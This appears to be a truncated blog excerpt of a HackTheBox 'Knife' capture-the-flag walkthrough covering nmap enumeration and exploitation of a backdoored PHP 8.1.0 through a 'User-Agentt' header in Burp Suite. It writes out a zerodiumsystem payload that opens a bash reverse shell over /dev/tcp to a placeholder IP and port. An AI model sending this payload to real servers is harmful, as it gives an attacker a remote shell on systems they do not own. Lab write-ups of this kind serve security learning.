Posts

Showing posts from June, 2021

HackTheBox : Knife Walkthrough

Image
  Concepts Learnt : Enumeration 2. Burp Suite 3. PHP Vulnerability 4. Ruby (Knife) Steps to Enumerate : Run an Nmap Scan to find all the open ports! Command : nmap 10.10.10.242 -A 10.10.10.242  IP of the Server -A  This options makes  Nmap  make an effort in identifying the target OS,services and the versions. It also does traceroute and applies NSE scripts to detect additional information. -vv  Defines level 2 verbosity for the scan We see that there are 2 ports open : 22/tcp- SSH port 80/tcp- HTTP port Lets check the http site on port 80: It is   a simple site with no clickable elements! We can see that PHP version is 8.1.0 which is vulnerable to  user agentt RCE Let run the site through burp suite and exploit Capture using the proxy! Now pass it through the repeater and use the RCE code to execute! Command:  User-Agentt: zerodiumsystem(“/bin/bash -c ‘bash -i >& /dev/tcp/ip/port 0>&1’”); Add your IP and port in the command abo...